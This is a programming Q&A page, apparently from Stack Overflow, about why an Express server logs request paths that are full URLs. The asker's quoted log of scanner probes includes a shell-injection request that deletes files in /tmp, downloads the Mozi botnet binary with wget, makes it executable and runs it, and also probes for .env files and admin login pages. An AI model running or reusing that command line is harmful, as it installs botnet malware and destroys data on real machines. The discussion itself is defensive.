CODEWITHSUNDEEP
javascriptnode.jsexpresssecuritywebsecurity
Royston dsouza
Royston dsouza

Reputation: 65

How can expressjs req.url path be another url?

I recently found suspicious requests being made to my node-express server. So I wrote a middleware to log the request urls. Did log a lot of suspicious request paths most starting with '/', however some paths are actually another url. how is this possible in express request ? I tried to search on this but have not found anything. Could these request compromise the security of the node server. (eg. the req.url showing as http://icanhazip.com/ )

My log.txt file

/wp-content/
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f
/shell?cd+/tmp;rm+-rf+*;wget+http://AN_IP_WAS_HERE:40222/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
/.env
/.env
http://example.com/<-- how is this possible in express request ?
/boaform/admin/formLogin
http://icanhazip.com/  <-- how is this possible in express request ?

Code used to log requests

app.use((req,res,next) => {
    var isvalid = true;

    //some validation code here

    if(!isvalid){
        fs.appendFileSync("./log.txt", "\r\n"+ req.url);
        res.send("...");
    } else next();
});

Upvotes: 1

Views: 317

Answers (1)

Quentin
Quentin

Reputation: 943591

how is this possible in express request ?

A really basic HTTP request looks like this:

GET /your/path HTTP/1.1

And any normal client is going to put a sensible path there.

If you're writing your own client, or constructing the request by hand (e.g. by typing into a telnet client connected to the HTTP port) then you can write whatever you like there:

GET http://example.com/ HTTP/1.1

Could these request compromise the security of the node server.

Generally not. They are looking for a security hole to exploit. Don't do insecure things with user input and stay up to date with security patches for modules you depend on and you'll be fine.

Upvotes: 1

Related Questions